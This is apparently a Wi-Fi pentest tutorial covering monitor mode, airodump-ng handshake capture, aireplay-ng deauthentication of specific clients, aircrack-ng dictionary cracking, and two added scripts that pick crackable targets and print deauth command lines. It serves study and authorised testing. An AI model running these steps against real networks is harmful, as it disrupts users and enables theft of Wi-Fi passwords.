# Wi-Fi Pentest

## Setup

### Adapter

{%preview https://hackmd.io/@lywslc/By6N2czr-x %}

### Configure NetworkManager

Tell NetworkManager to ignore the Wi-Fi interface so it does not fight with tools such as hostapd or aircrack-ng for control of it (otherwise it keeps resetting the interface to managed mode, scanning and reconnecting behind your back):

```bash
sudo vim /etc/NetworkManager/NetworkManager.conf
```

Add the following to the bottom of the config file (use your own interface name if it is not `wlan0`; `iw dev` lists it):

```ini
[keyfile]
unmanaged-devices=interface-name:wlan0
```

Restart the service to apply the change. Afterwards `nmcli device status` should list the interface as `unmanaged`:

```bash
sudo systemctl restart NetworkManager
```

> [!Important]
> Kali Linux kernel version `6.17` may encounter errors in monitor mode. Use `6.12` instead (e.g., `6.12.38+kali-rt-arm64`).

## General Commands

### Check Interface Info

```bash
iw dev
```

`iw dev` lists every wireless interface with its `type` (the current mode), the channel it is on and, for a connected station, the MAC of the AP.

#### Modes

- **Managed**: Standard client (station) mode. Used for connecting to Access Points (APs).
- **Monitor**: The radio passes up every 802.11 frame it hears on the current channel (data, management and control frames, each with a radiotap header), and drivers that support it allow **injecting** arbitrary frames. This is the mode the aircrack-ng tools need.
- **AP**: Acting as an Access Point. Used for hosting hotspots (e.g., Evil Twin attacks).
- **Etc.**

### Switch Interface Mode

The type can only be changed while the interface is down:

```bash
sudo ip link set wlan0 down
sudo iw dev wlan0 set type [mode]
sudo ip link set wlan0 up
```

#### Available `<mode>` Parameters

- **managed**: (Default) Client mode. Connects to an AP as a station (STA).
- **monitor**: Listens to all traffic on the channel and allows packet injection. This is 802.11 monitor mode, not Ethernet promiscuous mode: you get raw frames with radiotap headers, and encrypted payloads stay encrypted.
- **ap**: Access Point mode (Master). `iw` does not switch into it directly: `set type ap` only prints a hint to run a management daemon such as hostapd, which puts the interface into AP mode itself.
- **Etc.**

#### Quick Examples

```bash
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
```

After bringing it back up, `iw dev` should show `type monitor`. If it has silently gone back to `managed`, NetworkManager or wpa_supplicant still owns the interface.

> [!Warning]
> If you encounter a "Device or resource busy" error, a background process is holding the interface. Run `sudo airmon-ng check kill` to stop interfering services (such as NetworkManager and wpa_supplicant).

### Check Wi-Fi Regulatory Domain

```bash
iw reg get
```

Output:

```
global
country 00: DFS-UNSET
    (755 - 928 @ 2), (N/A, 20), (N/A), PASSIVE-SCAN
    (2402 - 2472 @ 40), (N/A, 20), (N/A)
    (2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
    (5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
    # ...
    # (other bands omitted)
```

#### Parameters Explanation

- **country 00**: The world regulatory domain, used when the system does not know which country it is in. It is the most restrictive setting: 20 dBm maximum and most 5 GHz ranges passive-only.
- **Output Syntax**: `(start - end MHz @ max channel width MHz), (max antenna gain dBi, max EIRP dBm), (DFS CAC time)`, followed by flags. `N/A` for the gain means no limit is specified.
- **PASSIVE-SCAN** (newer `iw` versions print `NO-IR` instead): the card may only listen on these frequencies. It must not send probe requests, and the kernel refuses monitor-mode injection on such channels. Under the world domain the restriction is lifted per channel once the driver has seen an AP beacon there, which is why injection on 5 GHz often fails silently under `country 00`.

#### Change Region (to unlock higher TX Power/Channels)

```bash
sudo iw reg set TW
```

`TW` is the ISO 3166-1 alpha-2 code for Taiwan; use the code of the country you are physically in, since transmitting on channels or at power levels your location does not permit is illegal. Confirm with `iw reg get` that the country actually changed: the kernel needs the regulatory database (`wireless-regdb`) to honour the request, and some adapters carry a region burned into their EEPROM that the driver enforces regardless.

### Checking Driver Capabilities

```bash
iw list
```

#### Key Sections to Look For:

- **Supported interface modes**: Whether `monitor` and `AP` are available at all.
- **valid interface combinations**: Which modes can run at the same time (e.g., one AP plus one monitor interface), which matters for Evil Twin setups.
- **Supported Ciphers**: Shows hardware support for WEP, WPA2 (CCMP), etc.
- **Frequencies**: Lists every channel per band with its maximum TX power and flags such as `disabled`, `no IR` or `radar detection`; a channel flagged `no IR` cannot be injected on.

### Scanning Available WiFi

The interface must be in `managed` mode and up for `scan` to work (a monitor-mode interface refuses). This command shows SSID, signal and whether encryption is on:

```bash
sudo iw dev wlan0 scan | grep -E '^BSS|signal:|SSID:|capability:'
```

#### Output Fields Explanation:

- **signal**: Received signal strength in dBm (closer to `0` is stronger, e.g., `-30` is better than `-80`).
- **SSID**: The Wi-Fi name.
- **capability**:
  - `ESS`: Regular Access Point (infrastructure mode).
  - `Privacy`: **Encrypted** (requires a password). If missing, the network is **Open**.
- **RSN / WPA**: `Privacy` alone does not say which protocol. The `RSN:` block (and, for WPA1, `WPA:`) in the unfiltered scan output does: `Authentication suites: PSK` is WPA2-Personal, `SAE` is WPA3-Personal, `PSK SAE` is WPA2/WPA3 transition mode, `IEEE 802.1X` is Enterprise. `MFP-required` in the RSN `Capabilities` line means 802.11w protected management frames, which makes deauth attacks ineffective. Add `RSN:|Authentication suites:|Capabilities:` to the `grep` pattern to see these lines.
- **HT/VHT/HE**: The `HT capabilities:`, `VHT capabilities:` and `HE capabilities:` blocks indicate the IEEE standard:
  - `HT`: 802.11n (Wi-Fi 4)
  - `VHT`: 802.11ac (Wi-Fi 5)
  - `HE`: 802.11ax (Wi-Fi 6)

## Pretend Wi-Fi AP

{%preview https://hackmd.io/@lywslc/rJ89gTVSbl %}

## Aircrack-ng Suite

### airmon-ng (Monitor Mode Management)

Used to kill interfering processes and enable monitor mode on the interface.

#### Kill Interfering Processes

Before starting monitor mode, stop services that might interfere (e.g., NetworkManager, wpa_supplicant). This drops any existing Wi-Fi connection; start NetworkManager again (`sudo systemctl start NetworkManager`) when you are done.

```bash
sudo airmon-ng check kill
```

#### Enable Monitor Mode

```bash
sudo airmon-ng start wlan0
```

> [!Note]
> After running this, the interface name will likely change from `wlan0` to `wlan0mon`. Check with `iw dev`. `sudo airmon-ng stop wlan0mon` reverts it to managed mode.

### airodump-ng (Packet Sniffing)

Used to capture raw 802.11 frames, discover Access Points (APs) and their clients, and capture handshakes.
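The `iw dev wlan0 scan` grep pipeline in the General Commands section above only shows the `Privacy` bit. The script below is an added example, not part of these notes or of the iw or aircrack-ng projects: it reads the same scan output and classifies each BSS from its RSN/WPA information elements (WPA2-PSK, WPA3-SAE, transition mode, enterprise, WEP, open) and its 802.11w status, which tells you before touching airodump-ng whether a deauth-based handshake capture can work against that network. The function names `sample_scan` and `summarize_scan` are mine, and the scan text is a constructed sample (made-up BSSIDs, SSIDs and signal values, trimmed to the lines that matter); for live use pipe `sudo iw dev wlan0 scan` into `summarize_scan`.

```shell
#!/bin/sh
# Added example (not from the original notes): classify the BSSs in
# `iw dev <iface> scan` output by their RSN/WPA IEs and 802.11w (PMF) flags.
# Output: <bssid> ch<channel> <signal> <security> pmf:<none|optional|required> <ssid>

# Constructed sample of `iw dev wlan0 scan` output. Addresses, SSIDs and signal
# values are invented; real output has many more IEs per BSS. Tabs via printf %b.
sample_scan() {
  printf '%b\n' \
    'BSS 00:11:22:33:44:55(on wlan0)' \
    '\tfreq: 2437' \
    '\tcapability: ESS Privacy ShortSlotTime (0x0411)' \
    '\tsignal: -45.00 dBm' \
    '\tSSID: HomeNet' \
    '\tRSN:\t * Version: 1' \
    '\t\t * Group cipher: CCMP' \
    '\t\t * Pairwise ciphers: CCMP' \
    '\t\t * Authentication suites: PSK' \
    '\t\t * Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)' \
    '\tHT capabilities:' \
    'BSS 66:77:88:99:aa:bb(on wlan0)' \
    '\tfreq: 5180' \
    '\tcapability: ESS Privacy SpectrumMgmt (0x0111)' \
    '\tsignal: -60.00 dBm' \
    '\tSSID: Office-Secure' \
    '\tRSN:\t * Version: 1' \
    '\t\t * Pairwise ciphers: CCMP' \
    '\t\t * Authentication suites: SAE' \
    '\t\t * Capabilities: 1-PTKSA-RC 1-GTKSA-RC MFP-required MFP-capable (0x00c0)' \
    'BSS cc:dd:ee:ff:00:11(on wlan0)' \
    '\tfreq: 5745' \
    '\tcapability: ESS Privacy (0x0011)' \
    '\tsignal: -71.00 dBm' \
    '\tSSID: Cafe5G' \
    '\tRSN:\t * Version: 1' \
    '\t\t * Pairwise ciphers: CCMP' \
    '\t\t * Authentication suites: PSK SAE' \
    '\t\t * Capabilities: 1-PTKSA-RC 1-GTKSA-RC MFP-capable (0x0080)' \
    'BSS 22:33:44:55:66:77(on wlan0)' \
    '\tfreq: 2412' \
    '\tcapability: ESS ShortSlotTime (0x0401)' \
    '\tsignal: -38.00 dBm' \
    '\tSSID: Free_WiFi' \
    'BSS 88:99:aa:bb:cc:dd(on wlan0)' \
    '\tfreq: 2462' \
    '\tcapability: ESS Privacy (0x0011)' \
    '\tsignal: -80.00 dBm' \
    '\tSSID: OldPrinter'
}

# Read `iw ... scan` output on stdin, print one summary line per BSS.
summarize_scan() {
  awk '
    function flush() {
      if (bssid == "") return
      if (rsn) {                              # RSN IE wins over legacy WPA IE
        if (akm ~ /SAE/ && akm ~ /PSK/) sec = "WPA2/WPA3-transition"
        else if (akm ~ /SAE/)           sec = "WPA3-SAE"
        else if (akm ~ /802\.1X/)       sec = "WPA2-Enterprise"
        else                            sec = "WPA2-PSK"
      } else if (wpa)     sec = "WPA1"
      else if (privacy)   sec = "WEP"         # Privacy bit but no RSN/WPA IE
      else                sec = "OPEN"
      pmf = mfpr ? "pmf:required" : (mfpc ? "pmf:optional" : "pmf:none")
      if (ssid == "") ssid = "<hidden>"
      print bssid, "ch" chan, signal, sec, pmf, ssid
    }
    /^BSS / { flush()
              bssid = substr($2, 1, 17); chan = ""; signal = ""; ssid = ""
              privacy = 0; wpa = 0; rsn = 0; akm = ""; mfpr = 0; mfpc = 0; section = "" }
    /^\t[^\t]/ { section = "" }               # any top-level IE ends the RSN/WPA block
    /^\tfreq: / { f = $2 + 0                  # MHz -> channel number
                  if (f == 2484) chan = 14
                  else if (f < 2484) chan = (f - 2407) / 5
                  else if (f >= 5955) chan = (f - 5950) / 5   # 6 GHz
                  else chan = (f - 5000) / 5 }
    /^\tsignal: / { signal = $2 }
    /^\tSSID: / { ssid = substr($0, 8) }
    /^\tcapability: / && / Privacy/ { privacy = 1 }
    /^\tRSN:/ { rsn = 1; section = "RSN" }
    /^\tWPA:/ { wpa = 1; section = "WPA" }
    section == "RSN" && /Authentication suites:/ {
      s = $0; sub(/.*Authentication suites: */, "", s); akm = s }
    section == "RSN" && /Capabilities:/ {      # 802.11w bits live in RSN capabilities
      if ($0 ~ /MFP-required/) mfpr = 1
      if ($0 ~ /MFP-capable/)  mfpc = 1 }
    END { flush() }
  '
}

# Live use: sudo iw dev wlan0 scan | summarize_scan
sample_scan | summarize_scan
```

Networks that come out as `WPA3-SAE` with `pmf:required` are not candidates for the deauth-plus-aircrack-ng workflow below; `WPA2/WPA3-transition` ones are, but only for clients that still connect with WPA2.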
#### Scan All Networks

```bash
sudo airodump-ng wlan0mon
```

By default airodump-ng hops across the 2.4 GHz channels only; add `--band abg` to include 5 GHz.

#### Output Fields Explanation

The upper table lists APs; the lower table (**STATION**) lists clients together with the **BSSID** they are associated with, which is where the client MAC for a targeted deauth comes from.

* **BSSID**: MAC address of the Access Point.
* **PWR**: Signal strength in dBm (closer to `0` is stronger; `-1` means the driver does not report it).
* **Beacons**: Announcement frames sent by the AP.
* **#Data**: Number of data frames captured (more is better for WEP cracking; for WPA it shows the AP has clients generating traffic).
* **CH**: Channel number.
* **ENC**: Encryption method (`OPN`, `WEP`, `WPA`, `WPA2`, `WPA3`; transition-mode APs show `WPA3 WPA2`). The neighbouring **CIPHER** and **AUTH** columns show the cipher (`CCMP`, `TKIP`) and key management (`PSK`, `SAE`, `MGT` for enterprise); only `PSK` networks can be cracked offline from a handshake.
* **ESSID**: The Wi-Fi name.

#### Targeted Scan (Capture Handshake)

Once you identify a target, focus on its specific channel and BSSID to capture the **WPA Handshake**.

```bash
sudo airodump-ng --bssid <AP_MAC> --channel <CH> --write capture_filename wlan0mon
```

* `--write`: Saves the capture files with a `-01` suffix (`capture_filename-01.cap`, `.csv`, `.kismet.csv`, ...); the number increments on each run.
* `--bssid`: Only listen to the target AP.
* `--channel`: Lock the card to a specific channel to prevent channel hopping (you cannot capture a complete handshake while hopping).

When the handshake is captured, `WPA handshake: <AP_MAC>` appears in the top-right corner of the airodump-ng screen. Keep it running while you run aireplay-ng in a second terminal.

### aireplay-ng (Packet Injection)

Used to generate traffic or disrupt connections to force a client to reconnect (capturing the 4-way handshake).

#### Deauthentication Attack (Deauth)

Sends forged deauthentication frames so the client disconnects from the AP. When it automatically reconnects, `airodump-ng` captures the handshake.

```bash
sudo aireplay-ng --deauth 10 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
```

* `--deauth 10`: Send 10 rounds of deauthentication frames, each round a burst of 64 frames in each direction (`0` means loop forever).
* `-a`: The BSSID (MAC address) of the Access Point.
* `-c`: The MAC address of the specific victim client. Targeting one client is stealthier than omitting `-c`, which sends broadcast deauths to every client of the AP.

Caveats: the monitor interface must be on the AP's channel (the locked airodump-ng session above ensures this), the driver must support injection, and clients on networks with 802.11w (PMF) enabled, which is mandatory for WPA3, drop unprotected deauth frames, so the attack does nothing there.

### aircrack-ng (Cracking)

Used to run an offline dictionary attack on the pre-shared key using the captured `.cap` file. Each wordlist candidate is run through PBKDF2 with the SSID as salt, the PTK is derived from the nonces in the handshake, and the resulting MIC is compared with the one in the captured EAPOL frame; speed is therefore bounded by the wordlist and your CPU.

#### Crack WPA/WPA2-PSK

Requires a valid 4-way handshake captured by `airodump-ng`. This only works for PSK networks (`AUTH` column `PSK`): WPA3-SAE's Dragonfly exchange does not expose anything that can be brute-forced offline, so aircrack-ng cannot crack SAE handshakes. Against a WPA2/WPA3 transition-mode AP you can still crack the handshake of a client that connected with WPA2.

Before spending hours on a wordlist, confirm the capture actually contains a handshake by running `aircrack-ng capture_filename-01.cap` without a wordlist; the network list should show `WPA (1 handshake)`.

```bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <AP_MAC> capture_filename-01.cap
```

* `-w`: Path to the dictionary file (wordlist). On Kali, `rockyou.txt` ships compressed as `rockyou.txt.gz`; `gunzip` it first.
* `-b`: BSSID of the target AP (selects the specific handshake if the file contains multiple).
* **capture_filename-01.cap**: The capture file generated by airodump-ng.
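Filling in `<AP_MAC>`, `<CH>` and `<CLIENT_MAC>` for the airodump-ng and aireplay-ng commands above by eye is error-prone once more than a handful of networks are in range. The script below is an added example, not part of these notes or of the aircrack-ng project: it parses the `capture_filename-01.csv` that `airodump-ng --write` produces, lists each AP with its channel, key management and associated clients, and prints the targeted-capture and deauth command lines only for APs where they can pay off (PSK key management and at least one associated client), skipping SAE-only APs that aircrack-ng could not crack anyway. The function names `sample_csv`, `ap_summary` and `deauth_plan` and the interface name `wlan0mon` are mine; the CSV content is a constructed sample in airodump-ng's layout with invented MAC addresses, timestamps and names. For live use, run `ap_summary < capture_filename-01.csv` or `deauth_plan < capture_filename-01.csv`.

```shell
#!/bin/sh
# Added example (not from the original notes): turn an airodump-ng CSV into a
# handshake-capture plan. Nothing here is executed against a radio; the
# commands are only printed. Assumes the monitor interface is wlan0mon.

# Constructed sample of capture_filename-01.csv (airodump-ng layout: CRLF line
# endings, padded numeric columns, AP table then STATION table). All invented.
sample_csv() {
  printf '%b\r\n' \
    '' \
    'BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key' \
    '00:11:22:33:44:55, 2024-05-01 10:00:00, 2024-05-01 10:05:00,  6, 130, WPA2, CCMP, PSK, -45,      120,       30,   0.  0.  0.  0,   7, HomeNet, ' \
    '66:77:88:99:AA:BB, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 36, 866, WPA3, CCMP, SAE, -60,       90,        0,   0.  0.  0.  0,  13, Office-Secure, ' \
    'CC:DD:EE:FF:00:11, 2024-05-01 10:00:02, 2024-05-01 10:05:00, 149, 866, WPA3 WPA2, CCMP, SAE PSK, -71,       60,       12,   0.  0.  0.  0,   6, Cafe5G, ' \
    '22:33:44:55:66:77, 2024-05-01 10:00:03, 2024-05-01 10:05:00,  1,  54, OPN,  ,  , -38,      200,        0,   0.  0.  0.  0,   9, Free_WiFi, ' \
    '' \
    'Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs' \
    'AA:BB:CC:DD:EE:01, 2024-05-01 10:00:01, 2024-05-01 10:05:00, -50,      200, 00:11:22:33:44:55, HomeNet' \
    'AA:BB:CC:DD:EE:02, 2024-05-01 10:00:04, 2024-05-01 10:04:58, -55,       80, 00:11:22:33:44:55,' \
    'AA:BB:CC:DD:EE:03, 2024-05-01 10:00:05, 2024-05-01 10:05:00, -62,       15, 66:77:88:99:AA:BB, Office-Secure' \
    'AA:BB:CC:DD:EE:04, 2024-05-01 10:00:06, 2024-05-01 10:05:00, -70,       12, (not associated), Free_WiFi,HomeNet' \
    ''
}

# Read an airodump-ng CSV on stdin; print one line per AP:
#   <bssid> ch<channel> <privacy>/<auth> clients=<mac,mac|-> <essid>
ap_summary() {
  awk -F', *' '
    { sub(/\r$/, "") }                       # strip CR, re-split fields
    /^BSSID,/        { mode = "ap";  next }  # AP table header
    /^Station MAC,/  { mode = "sta"; next }  # STATION table header
    /^ *$/           { next }
    mode == "ap"  { n++; order[n] = $1
                    ch[$1] = $4; priv[$1] = $6; auth[$1] = $8; essid[$1] = $14 }
    mode == "sta" && $6 != "(not associated)" {
      clients[$6] = (clients[$6] == "") ? $1 : clients[$6] "," $1 }
    END {
      for (i = 1; i <= n; i++) {
        b = order[i]; p = priv[b]; a = auth[b]
        gsub(/ /, "+", p); gsub(/ /, "+", a)   # "WPA3 WPA2" -> "WPA3+WPA2"
        c = (b in clients) ? clients[b] : "-"
        print b, "ch" ch[b], p "/" a, "clients=" c, essid[b]
      }
    }
  '
}

# Print the airodump-ng/aireplay-ng command lines for every AP that has PSK
# key management and at least one associated client; explain each skip.
deauth_plan() {
  ap_summary | while read -r bssid ch sec clients essid; do
    ch=${ch#ch}
    clients=${clients#clients=}
    case "$sec" in
      */*PSK*) ;;                            # WPA/WPA2-PSK or WPA3 transition mode
      *) echo "# skip $bssid ($essid): $sec, no PSK handshake to crack"; continue ;;
    esac
    if [ "$clients" = "-" ]; then
      echo "# skip $bssid ($essid): no associated client to deauth"; continue
    fi
    echo "sudo airodump-ng --bssid $bssid --channel $ch --write cap_$(printf '%s' "$bssid" | tr -d ':') wlan0mon"
    echo "$clients" | tr ',' '\n' | while read -r sta; do
      echo "sudo aireplay-ng --deauth 5 -a $bssid -c $sta wlan0mon"
    done
  done
}

sample_csv | deauth_plan
```

The plan deliberately prints rather than runs the commands: the airodump-ng capture has to be running in its own terminal before the deauth is sent, and you want to pick one client at a time rather than hit every station the CSV lists.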
> [!Tip]
> If you see `KEY FOUND! [ password123 ]`, you have successfully cracked the network. If aircrack-ng instead reports that no valid handshake was found, re-run the deauth while airodump-ng is still writing to the capture and try again.